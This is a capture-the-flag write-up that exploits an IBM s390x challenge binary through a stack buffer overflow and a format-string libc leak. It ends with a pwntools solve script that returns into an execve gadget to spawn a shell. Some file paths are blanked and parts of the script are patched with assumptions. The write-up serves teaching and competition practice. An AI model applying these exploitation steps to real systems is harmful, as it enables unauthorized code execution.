US Cyber Open 2022 - Gibson - Stack overflow to RCE on s390x

Posted on Sep 14, 2022

Can you really call it a “main”frame if I haven’t used it before now? Author: Research Innovations, Inc. (RII)

Gibson was a binary exploitation challenge in the US Cyber Open CTF in 2022, which is the first step toward qualification for the US Cyber Team. At the end of the CTF, it was worth 1000 points and had 10 solves. I was the fourth solve on this challenge (could have been second if CTFd wasn’t glitching[1] 😔).

Anyways, let’s get to the challenge!

We are given a tarball that contains a docker setup (for both debug and testing), and the binaries for the challenge (which were a program called mainframe and the file that it dynamically loads).

Initial Investigation - What even is this?

Running file and checksec on the binary, we find that it is compiled for the s390x architecture. I’d never heard of this architecture before, but looking it up, it looks like it was designed by IBM, and the original S/390 hardware was apparently discontinued in 1998, although the 64-bit s390x variant is still supported by Linux. 💀

$ file mainframe
mainframe: ELF 64-bit MSB executable, IBM S/390, version 1 (SYSV), dynamically linked, interpreter /lib/, BuildID[sha1]=5684ff421a651508bbe92190636290180d7e03c2, for GNU/Linux 3.2.0, not stripped
$ checksec mainframe
[!] Could not populate PLT: AttributeError: arch must be one of ['aarch64', 'alpha', 'amd64', 'arm', 'avr', 'cris', 'i386', 'ia64', 'm68k', 'mips', 'mips64', 'msp430', 'none', 'powerpc', 'powerpc64', 'riscv', 's390', 'sparc', 'sparc64', 'thumb', 'vax']
[*] '/home/ethan/ctf/uscyberopen/pwn/gibson/gibson_s390x/bin/mainframe'
    Arch:     em_s390-64-big
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x1000000)

This gives us some information about the binary. Seems that s390x is a big-endian architecture (yikes!), and that the binary is compiled with no PIE and no canary.
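To make the endianness point concrete, here is a minimal sketch using only Python's standard struct module. The value packed is just the load address from the checksec output, used as sample data rather than anything the exploit needs.

```python
import struct

addr = 0x1000000  # load address reported by checksec, used here only as sample data

big = struct.pack(">Q", addr)     # byte order s390x uses for a 64-bit value
little = struct.pack("<Q", addr)  # byte order x86_64 would use for the same value

print(big.hex())     # 0000000001000000
print(little.hex())  # 0000000100000000
```

The practical consequence for us is that the high-order (usually zero) bytes of a pointer come first in memory, which matters later when leaking addresses with %s.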

Setting up the environment - Thanks for the help!

Thankfully, the challenge author has left a file for us to read, to guide us in setting up a debug/test environment. Not only that, but a docker-compose.yml file has been left for us to do all the necessary configuration for the challenge environment. Other people did run into some problems with the debug environment not working, but this could be solved by updating to the latest version of Docker and docker-compose.

Running docker-compose up --build -d, we start the containers—one for debug and one for testing. As we can see from the file, we can connect to localhost:8888 to access the debug challenge, localhost:1234 to access the qemu gdbserver, and localhost:9999 to access a testing environment for the challenge that should be identical to the one that the organizers have.

Now that we have a debug environment, we can start with the actual challenge!

Reverse engineering - Time to guess what opcodes do!

I looked online for any decompilers for s390x, but it seems that there was nothing. So, I installed s390x-linux-gnu-objdump with apt-get install binutils-s390x-linux-gnu, and started reading through the assembly code. The important part of the disassembly is the main function:

Sidenote: Sadly, s390x-linux-gnu-objdump does not seem to support Intel syntax, so we’ll have to bear with what we have right now.😢

0000000001000830 <main>:
 1000830:       eb bf f0 58 00 24       stmg    %r11,%r15,88(%r15)
 1000836:       e3 f0 fb 58 ff 71       lay     %r15,-1192(%r15)
 100083c:       b9 04 00 bf             lgr     %r11,%r15
 1000840:       c4 18 00 00 0b d8       lgrl    %r1,1001ff0 <stdin@GLIBC_2.2>
 1000846:       e3 10 10 00 00 04       lg      %r1,0(%r1)
 100084c:       a7 59 00 00             lghi    %r5,0
 1000850:       a7 49 00 02             lghi    %r4,2
 1000854:       a7 39 00 00             lghi    %r3,0
 1000858:       b9 04 00 21             lgr     %r2,%r1
 100085c:       c0 e5 ff ff ff 1c       brasl   %r14,1000694 <setvbuf@plt>
 1000862:       c4 18 00 00 0b cb       lgrl    %r1,1001ff8 <stdout@GLIBC_2.2>
 1000868:       e3 10 10 00 00 04       lg      %r1,0(%r1)
 100086e:       a7 59 00 00             lghi    %r5,0
 1000872:       a7 49 00 02             lghi    %r4,2
 1000876:       a7 39 00 00             lghi    %r3,0
 100087a:       b9 04 00 21             lgr     %r2,%r1
 100087e:       c0 e5 ff ff ff 0b       brasl   %r14,1000694 <setvbuf@plt>
 1000884:       ec 1b 00 a0 00 d9       aghik   %r1,%r11,160
 100088a:       a7 49 04 00             lghi    %r4,1024
 100088e:       a7 39 00 00             lghi    %r3,0
 1000892:       b9 04 00 21             lgr     %r2,%r1
 1000896:       c0 e5 ff ff ff 0f       brasl   %r14,10006b4 <memset@plt>
 100089c:       c0 20 00 00 00 d6       larl    %r2,1000a48 <_IO_stdin_used+0x4>
 10008a2:       c0 e5 ff ff fe d9       brasl   %r14,1000654 <puts@plt>
 10008a8:       c0 20 00 00 00 d7       larl    %r2,1000a56 <_IO_stdin_used+0x12>
 10008ae:       c0 e5 ff ff fe d3       brasl   %r14,1000654 <puts@plt>
 10008b4:       ec 1b 00 a0 00 d9       aghik   %r1,%r11,160
 10008ba:       a7 49 07 d0             lghi    %r4,2000
 10008be:       b9 04 00 31             lgr     %r3,%r1
 10008c2:       a7 29 00 00             lghi    %r2,0
 10008c6:       c0 e5 ff ff fe 97       brasl   %r14,10005f4 <read@plt>
 10008cc:       c0 20 00 00 00 cf       larl    %r2,1000a6a <_IO_stdin_used+0x26>
 10008d2:       c0 e5 ff ff fe c1       brasl   %r14,1000654 <puts@plt>
 10008d8:       e5 48 b4 a0 00 00       mvghi   1184(%r11),0
 10008de:       a7 f4 00 13             j       1000904 <main+0xd4>
 10008e2:       e3 10 b4 a0 00 04       lg      %r1,1184(%r11)
 10008e8:       43 11 b0 a0             ic      %r1,160(%r1,%r11)
 10008ec:       c0 17 00 00 00 52       xilf    %r1,82
 10008f2:       18 21                   lr      %r2,%r1
 10008f4:       e3 10 b4 a0 00 04       lg      %r1,1184(%r11)
 10008fa:       42 21 b0 a0             stc     %r2,160(%r1,%r11)
 10008fe:       eb 01 b4 a0 00 7a       agsi    1184(%r11),1
 1000904:       e3 10 b4 a0 00 04       lg      %r1,1184(%r11)
 100090a:       c2 1e 00 00 03 ff       clgfi   %r1,1023
 1000910:       a7 c4 ff e9             jle     10008e2 <main+0xb2>
 1000914:       a7 29 00 00             lghi    %r2,0
 1000918:       c0 e5 ff ff fe 8e       brasl   %r14,1000634 <sleep@plt>
 100091e:       ec 1b 00 a0 00 d9       aghik   %r1,%r11,160
 1000924:       b9 04 00 21             lgr     %r2,%r1
 1000928:       c0 e5 ff ff fe 76       brasl   %r14,1000614 <printf@plt>
 100092e:       a7 18 00 00             lhi     %r1,0
 1000932:       b9 14 00 11             lgfr    %r1,%r1
 1000936:       b9 04 00 21             lgr     %r2,%r1
 100093a:       eb bf b5 00 00 04       lmg     %r11,%r15,1280(%r11)
 1000940:       07 fe                   br      %r14
 1000942:       07 07                   nopr    %r7
 1000944:       07 07                   nopr    %r7
 1000946:       07 07                   nopr    %r7

These opcodes are different than the familiar ones, as this is not x86. I found a reference for the opcodes at, but a lot of the opcodes do not have a wiki article added so I had to do a bit of inferring as to what each opcode did.

While investigating s390x, I also noticed that at the end of each function, we have a br %r14 instruction. This instruction branches to the address held in r14, and brasl %r14,<target> stores the address of the next instruction in r14 when a function is called. In other words, the return address lives in the r14 register. I also found that r15 is being used as the stack pointer.

After a while, I found two vulnerabilities. First of all, there’s a stack buffer overflow at 0x10008c6:

 10008b4:       ec 1b 00 a0 00 d9       aghik   %r1,%r11,160
 10008ba:       a7 49 07 d0             lghi    %r4,2000
 10008be:       b9 04 00 31             lgr     %r3,%r1
 10008c2:       a7 29 00 00             lghi    %r2,0
 10008c6:       c0 e5 ff ff fe 97       brasl   %r14,10005f4 <read@plt>

Here, up to 2000 bytes are read into a buffer that appears to be only 1024 bytes long (the same address, r11 + 160, is cleared with a 1024-byte memset earlier in main). We can guess from here that the calling convention for this architecture passes arguments through r2, r3, and then r4, because we see read(0, <address>, 2000) being called.
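The distance from the buffer to the saved registers can also be estimated statically from the constants in the disassembly. The following is a rough sketch of that arithmetic; the variable names are mine, and it assumes that the buffer starts at r11 + 160 and that the epilogue's lmg at 1280(%r11) restores what the prologue's stmg saved.

```python
FRAME_SIZE = 1192      # lay  %r15,-1192(%r15)
SAVE_AREA = 88         # stmg %r11,%r15,88(%r15), relative to the caller's r15
BUF_OFFSET = 160       # aghik %r1,%r11,160
CLEARED_LEN = 1024     # lghi %r4,1024 before memset
READ_LEN = 2000        # lghi %r4,2000 before read

# Saved r11..r15 sit at this offset from the new r11/r15,
# which matches lmg %r11,%r15,1280(%r11) in the epilogue.
saved_regs = FRAME_SIZE + SAVE_AREA

# Bytes of input needed before we start overwriting the saved r11.
offset_to_saved = saved_regs - BUF_OFFSET

# How far past the start of the saved registers read() lets us write.
overshoot = READ_LEN - offset_to_saved

print(saved_regs, offset_to_saved, overshoot)  # 1280 1120 880
```

Five 8-byte registers (r11 through r15) only need 40 bytes, so 880 bytes of overshoot is far more than enough.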

Another vulnerability that I found was that at 0x1000928, user input is passed through r2, making it the first argument to printf. This is a format string vulnerability.

 100091e:       ec 1b 00 a0 00 d9       aghik   %r1,%r11,160
 1000924:       b9 04 00 21             lgr     %r2,%r1
 1000928:       c0 e5 ff ff fe 76       brasl   %r14,1000614 <printf@plt>

However, after running the program (through connecting to localhost:9999), we can see that the lines of assembly before the call to printf do manipulate our input a little bit.

$ nc localhost 9999
Enter payroll data:
Processing data...

Through looking at the assembly and experimenting a bit, we can see that our input is XORed with the character R before being passed to printf. This shouldn’t be a problem, because we can just XOR our input with R before passing it to the program.
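Since XOR is its own inverse, pre-encoding is a one-liner. Here is a small standard-library sketch of the idea; the helper name xor_with_key and the sample format string are illustrative, and the key 82 comes from the xilf %r1,82 instruction in the loop (82 is ASCII R).

```python
KEY = ord("R")  # 82, the immediate in `xilf %r1,82`

def xor_with_key(data: bytes, key: int = KEY) -> bytes:
    """XOR every byte with a single-byte key, as the loop in main does."""
    return bytes(b ^ key for b in data)

wanted = b"%p.%p.%p"             # what we want printf to see (sample only)
to_send = xor_with_key(wanted)   # what we actually send

# The program applies the same XOR again, which restores our format string.
assert xor_with_key(to_send) == wanted
```

Note that the loop only runs over indexes 0 through 1023, so anything we place beyond the first 1024 bytes of input is left as-is.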

So, let’s see what we know at this point:

  • The program reads in too much input, leading to a stack buffer overflow
  • The program also calls printf() on the input XORed with R, allowing us to leak values (or write to arbitrary addresses with the %n format specifier)

Exploitation - What do we control?

We do have a stack overflow, but we do not know if the stack in s390x works the same way as in x86. So, we do some experimentation.

First, we generate a cyclic pattern with cyclic 2000 -n 8. Then we pass it to the program running with GDB at localhost:8888. This can be debugged with the gdbserver running at localhost:1234 using gdb-multiarch:

gef➤  set architecture s390:64-bit
The target architecture is assumed to be s390:64-bit
gef➤  file bin/mainframe
Reading symbols from bin/mainframe...
(No debugging symbols found in bin/mainframe)
Python Exception <class 'ValueError'> 22 is not a valid Abi:
gef➤  target remote localhost:1234

We can then examine the registers in GDB with info reg. Five of the registers look like they have been affected by our input:

r11            0x7061616161616166  0x7061616161616166
r12            0x7161616161616166  0x7161616161616166
r13            0x7261616161616166  0x7261616161616166
r14            0x7361616161616166  0x7361616161616166
r15            0x7461616161616166  0x7461616161616166

Seems that we have control over r11, r12, r13, r14, and r15! This is more register control than we would have in x86_64, where we have control over only rbp and rip. We know that r14 will be jumped to at the end of the function, so we do control the return address. We also know that r15 is the stack pointer, so our real payload should stop short of it and leave it unchanged. Lastly, we control r11 through r13, which could be useful later when trying to get a shell.

We look up the offset to our saved registers with cyclic -l 0x6661616161616170 -n 8. (Note how I had to convert the value of r11 from big endian to little endian.) This gives us an offset of 1120 bytes to our saved registers!
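The byte swap itself can be done by hand, but a couple of lines of Python avoid mistakes. This is a small sketch using only built-in integer methods, with the r11 value from the GDB output above as input.

```python
reg_value = 0x7061616161616166  # r11 as shown by GDB on the big-endian target

raw = reg_value.to_bytes(8, "big")       # the bytes as they sat in memory
swapped = int.from_bytes(raw, "little")  # same bytes read as a little-endian integer

print(raw)           # b'paaaaaaf'
print(hex(swapped))  # 0x6661616161616170
```

The swapped value is the one passed to cyclic -l above.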

The mainframe binary in and of itself does not have a win function or anything that would be useful to call, so we will have to try to leak the libc base address in order to get a shell. We can do this with a format string. This format string leak can be done in the same way as we would usually do a format string leak, so I will not cover the details here. However, there are two things that we must pay attention to:

  • We must make sure to XOR it with R when we are finished.
  • Because this is big-endian, the first two bytes are null. So, if we want to leak with %s, we must offset our address by 2 to get the non-null bytes.
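To illustrate the second point, here is a standard-library sketch of how six leaked bytes can be turned back into a 64-bit pointer and then into a base address. The helper name parse_leak and the sample bytes and offset are made up for the example; they are not values from the challenge.

```python
import struct

def parse_leak(leaked: bytes, symbol_offset: int) -> int:
    """Rebuild a big-endian 64-bit pointer from its six low-order bytes
    and subtract the symbol's offset to get the library base."""
    if len(leaked) < 6:
        raise ValueError("expected at least 6 leaked bytes")
    pointer = struct.unpack(">Q", b"\x00\x00" + leaked[:6])[0]
    return pointer - symbol_offset

# Hypothetical values, purely for illustration.
example_leak = bytes.fromhex("03ff7e123450")
example_offset = 0x23450

base = parse_leak(example_leak, example_offset)
print(hex(base))  # 0x3ff7e100000
```

One caveat with this approach: %s stops at the first null byte, so if any of those six bytes happens to be zero the leak comes back short and the run has to be retried.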

I used this python snippet with pwntools to generate the format string payload[2]:

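xor(b"%6$s\0\0\0\0" + p64(elf.got["puts"] + 2), b"R")  # assumed argument: puts GOT entry + 2 (the p64() argument is missing in the original snippet)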

We can parse this with u64() in pwntools, which will automatically use big endian for p64() and u64() if we set the context correctly.

Now that we have a leak, we can use our overflow to return back to the main function and do another overflow, this time with a leak!

Finding shell gadgets - Grep for the win!

Now that we have control of the program control flow and a leak, we can jump to an address that will give us a shell! On x86_64, I would use a one_gadget to spawn a shell. However, there are no tools (that I know of) that will do this on s390x. I’m not even sure if there are any one_gadgets on this version of the s390x libc. However, remembering that we have control over r11, r12, and r13, we can find something that’s close enough.

First of all, we need to look into syscalls in the s390x architecture. Finding a place where the execve syscall is being called is a good first step in finding somewhere that will spawn a shell. I found a table of syscall numbers in the kernel source code, which tells us that execve is syscall 11. Referring back to the table of instructions found earlier, we find that the svc instruction is used to call a syscall. We chain objdump and grep to find where this syscall is used:

$ s390x-linux-gnu-objdump -d  | grep -B 3 -A 3 'svc\s*11$'
   d9bfe:       07 07                   nopr    %r7

00000000000d9c00 <execve@@GLIBC_2.2>:
   d9c00:       0a 0b                   svc     11
   d9c02:       a7 49 f0 01             lghi    %r4,-4095
   d9c06:       b9 21 00 24             clgr    %r2,%r4
   d9c0a:       c0 b4 00 00 00 04       jgnl    d9c12 <execve@@GLIBC_2.2+0x12>
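The same filter can be written in Python if the disassembly has already been saved to a file or captured from a subprocess. This is only a sketch of the matching step: the sample text is copied from the output above, and the variable names are illustrative.

```python
import re

# Match "svc 11" at the end of a line so that e.g. "svc 110" is not a hit.
SVC_EXECVE = re.compile(r"\bsvc\s+11$")

sample = """\
   d9bfe:       07 07                   nopr    %r7
   d9c00:       0a 0b                   svc     11
   d9c02:       a7 49 f0 01             lghi    %r4,-4095
"""

# Collect the address column of every matching line.
hits = [line.split(":")[0].strip()
        for line in sample.splitlines()
        if SVC_EXECVE.search(line)]

print(hits)  # ['d9c00']
```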

There’s only one location where execve is called, at the beginning of the execve() function. We use the same strategy to find where execve() is called, and we find this gadget:

$ s390x-linux-gnu-objdump -d  | grep -B 3 -A 3 'd9c00'
   da680:       b3 cd 00 49             lgdr    %r4,%f9
   da684:       b3 cd 00 3e             lgdr    %r3,%f14
   da688:       b9 04 00 2d             lgr     %r2,%r13
   da68c:       c0 e5 ff ff fa ba       brasl   %r14,d9c00 <execve@@GLIBC_2.2>
   da692:       e3 10 b0 a0 00 04       lg      %r1,160(%r11)
   da698:       e3 60 10 00 00 04       lg      %r6,0(%r1)
   da69e:       58 16 a0 00             l       %r1,0(%r6,%r10)

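Jumping to libc base + 0xda688 will load the contents of r13 into r2 (where the first argument of the syscall is passed), then call execve(), which will invoke the execve syscall! Entering two instructions earlier, at 0xda680, does the same thing after first loading r3 and r4 from the floating-point registers f14 and f9.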

Because we control r13, we can put the address of /bin/sh (which is present in libc because of the system function) into the first argument passed to execve, hope that r3 and r4 are 0, and spawn a shell![3]

That gives us our final exploit path:

  • Leak libc address by using the format string to read from the GOT
  • Return to main because we control r14
  • Return to the shell gadget while setting r13 to a pointer to /bin/sh
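Both stages share the same overflow layout: padding up to offset 1120, then big-endian values for r11, r12, r13, and r14. Here is a standard-library sketch of that layout; build_overflow is a hypothetical helper name and the r13 value is a placeholder, while 0x1000830 is the address of main from the disassembly.

```python
import struct

OFFSET_TO_SAVED_REGS = 1120  # found with cyclic earlier

def build_overflow(prefix: bytes, r11: int, r12: int, r13: int, r14: int) -> bytes:
    """Pad `prefix` up to the saved registers, then append r11..r14 as
    big-endian 64-bit values. r15 (the stack pointer) is left untouched."""
    if len(prefix) > OFFSET_TO_SAVED_REGS:
        raise ValueError("prefix would run into the saved registers")
    body = prefix.ljust(OFFSET_TO_SAVED_REGS, b"a")
    return body + struct.pack(">4Q", r11, r12, r13, r14)

# Placeholder r13 value; r14 points back at main for a second pass.
stage = build_overflow(b"", 0, 0, 0x1122334455667788, 0x1000830)
print(len(stage))  # 1152
```

Stopping after r14 is a deliberate choice here, since writing eight more bytes would clobber the restored stack pointer.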

Putting it all together

Here’s my solve script:

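from pwn import *

elf = ELF("./mainframe")
libc = ELF("./")
context.arch = "s390"
context.bits = 64
conn = remote("localhost", 9999)

# Stage 1: leak puts from the GOT with %s, then return to main.
# The p64() argument is missing in the original; puts GOT entry + 2 is assumed from the text.
payload = xor(b"%6$s\0\0\0\0" + p64(elf.got["puts"] + 2), b"R")
payload = payload.ljust(1120, b"a")
payload += p64(0)  # r11
payload += p64(0)  # r12
payload += p64(0)  # r13
payload += p64(elf.sym.main) # r14
conn.send(payload) # ret2main

# Skip the prompts printed before printf runs (assumes the text shown in the nc session above)
conn.recvuntil(b"Processing data...\n")
libc.address = u64(b"\0\0" + conn.recv(6)) - libc.sym.puts # leak libc
info("libc @ " + hex(libc.address))

# Stage 2: overflow again, this time returning into the execve gadget.
payload = b""
payload = payload.ljust(1120, b"a")
payload += p64(0)  # r11
payload += p64(0)  # r12
payload += p64(next(libc.search(b"/bin/sh"))) # r13, gets copied into r2
payload += p64(libc.address + 0xda680) # r14, our shell gadget (enters at the lgdr pair just before the lgr at 0xda688)
conn.send(payload)
conn.interactive()
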
This gets us a shell, and we can run cat flag to get the flag[4]: USCG{RIIdiculouslyAwesome_5d4b48559f6ee937b9cbfc809bafad62}

[1] The organizers were not able to host the challenge as something that players could connect to, so instead we had to submit solve scripts through a (glitchy) submission box on CTFd. I believe that my submission didn’t go through the first time I solved it.😭

[2] Originally, I used %p to leak the libc address, but this was different on the debug and testing environments, probably because the stack was shifted around as a result of the different environments. A more reliable way was to use the GOT to leak, which is what I did in this writeup.

[3] After some discussion with others, it seems that some people were able to utilize the system function, or find a gadget to arbitrarily set r2. But I like this method because it’s the first thing that I found in libc. 🙂

[4] This was actually DMed to us afterwards, as the organizers ran the solve scripts against their own infrastructure rather than having players run them.